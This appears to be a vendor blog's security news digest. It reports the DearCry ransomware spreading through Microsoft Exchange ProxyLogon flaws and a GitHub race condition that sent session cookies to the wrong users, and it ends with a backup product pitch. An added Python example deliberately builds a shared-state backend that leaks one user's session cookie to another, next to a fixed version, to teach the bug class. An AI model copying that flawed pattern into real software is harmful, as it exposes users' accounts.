New DearCry ransomware now attacks Microsoft Exchange servers with ProxyLogon exploits

A week ago we urged you to patch four critical zero-day flaws in Microsoft Exchange. Unfortunately, last week those fears became reality: threat actors are using the vulnerabilities, now named ProxyLogon, to install the DearCry ransomware.

According to Michael Gillespie, the creator of the ransomware identification site ID-Ransomware, starting on March 9, users began submitting a new ransom note and encrypted files to his system. 

Microsoft has confirmed that the DearCry ransomware is installed in human-operated attacks on Microsoft Exchange servers using the ProxyLogon vulnerabilities.

MalwareHunterTeam was able to find three samples of this ransomware on VirusTotal, all of which are MinGW-compiled executables.

When launched, the DearCry ransomware attempts to shut down a Windows service named ‘msupdate.’ It is not known what this service is, but it does not appear to be a legitimate Windows service. The ransomware then begins to encrypt the files on the computer. When encrypting files, it appends the .CRYPT extension to the file’s name.

Gillespie said that the ransomware uses AES-256 + RSA-2048 to encrypt the files and prepends the ‘DEARCRY!’ string to the beginning of each encrypted file.

When done encrypting the computer, the ransomware will create a simple ransom note named ‘readme.txt’ on the Windows desktop. For at least one of the victims, the ransomware group demanded a $16,000 ransom.

Unfortunately, the ransomware does not appear to have any weaknesses that would allow victims to recover their files for free. For now, the only option is to recover data from a backup – that is why it is so important to have proven data backup software.

According to new data shared by Palo Alto Networks, tens of thousands of Microsoft Exchange servers have been patched over the last few days; experts admit that they have never seen patch rates this high for any system before. Unfortunately, the company states that there are still approximately 80,000 older servers that cannot directly apply the recent security updates.

All organizations are strongly advised to apply the patches as soon as possible! 

Source

GitHub fixes bug causing users to log into other accounts

On the night of March 8/9, GitHub automatically logged out many users by invalidating their GitHub.com sessions to protect user accounts against a potentially serious security vulnerability.

Earlier this month GitHub received a report of anomalous behavior from an external party. It stemmed from a rare race condition vulnerability in which a GitHub user’s login session was misrouted to the web browser of another logged-in user, giving the latter an authenticated session cookie for, and access to, the former user’s account. So GitHub signed out all users that were logged in prior to March 8th, 12:03 UTC, as the final step taken to patch the bug.

The vulnerability, according to GitHub, could be exploited in extremely rare circumstances when a race condition would occur during the backend request handling process. In such a case, the session cookie of a logged-in GitHub user would be sent to the browser of another user, giving the latter access to the former user’s account.
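The bug class described above, modelled as an added example (not GitHub’s code; the page does not give the actual mechanism, so the shared-slot model is an assumption): per-request session state kept in a process-wide slot is compared with state kept in an isolated per-request context, and a scheduler forces the interleaving that a real server hits only rarely. User names and cookie values are constructed.

```python
import contextvars
from dataclasses import dataclass


@dataclass
class Session:
    user: str
    cookie: str   # constructed sample values, not real session cookies


class SharedSlotBackend:
    """Bug class: the authenticated session lives in a process-wide slot that every
    in-flight request writes to, so a request interrupted between its two steps
    renders another user's cookie (assumed model of the reported race)."""
    current = None

    def handle(self, session):
        SharedSlotBackend.current = session            # step 1: authenticate
        yield                                           # another request may run here
        yield f"Set-Cookie: session={SharedSlotBackend.current.cookie}"  # step 2: render


_session = contextvars.ContextVar("session")


class ContextBackend:
    """Fix: session state is stored in the request's own context, so interleaving cannot leak it."""

    def handle(self, session):
        _session.set(session)
        yield
        yield f"Set-Cookie: session={_session.get().cookie}"


def serve_interleaved(backend, sessions):
    """Drive every request step by step in round-robin, each in its own context,
    forcing the worst-case interleaving a real server only hits occasionally."""
    requests = [(s, backend.handle(s), contextvars.copy_context()) for s in sessions]
    for _, gen, ctx in requests:
        ctx.run(next, gen)                      # all requests finish step 1...
    return {s.user: ctx.run(next, gen) for s, gen, ctx in requests}   # ...then step 2


def misrouted(responses, sessions):
    """Users whose response carries a cookie that is not their own."""
    return [s.user for s in sessions if responses[s.user] != f"Set-Cookie: session={s.cookie}"]


if __name__ == "__main__":
    users = [Session("alice", "cookie-A"), Session("bob", "cookie-B")]
    print("shared slot:", misrouted(serve_interleaved(SharedSlotBackend(), users), users))  # ['alice']
    print("per-request:", misrouted(serve_interleaved(ContextBackend(), users), users))   # []
```

The same check, run against a real application under concurrent load with distinct test accounts, is how a defender would confirm that session state never crosses requests.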

The company states that the underlying bug was present on GitHub.com for a cumulative period of under two weeks at certain points in time between February 8th and March 5th, 2021. There is no evidence that other GitHub.com assets or products such as GitHub Enterprise Server were impacted as a result of this bug.

GitHub states that fewer than 0.001% of authenticated sessions on GitHub.com were misrouted. Account owners affected by this issue were contacted by GitHub with additional information and guidance.

0.001% seems insignificant, but considering GitHub gets over 32 million active visitors (authenticated or not) in a month, it could be tens of thousands of accounts.

Authentication vulnerabilities like these, if exploited by adversaries, can pave the way for covert software supply-chain attacks. While GitHub has proved itself a very reliable code hosting platform, problems are inevitable for all service providers. Code as intellectual property might be the most valuable asset within your organization: make sure it is well protected and consider a third-party GitHub backup.

Such as Xopero ONE for GitHub: sign up for the beta tests.

Source
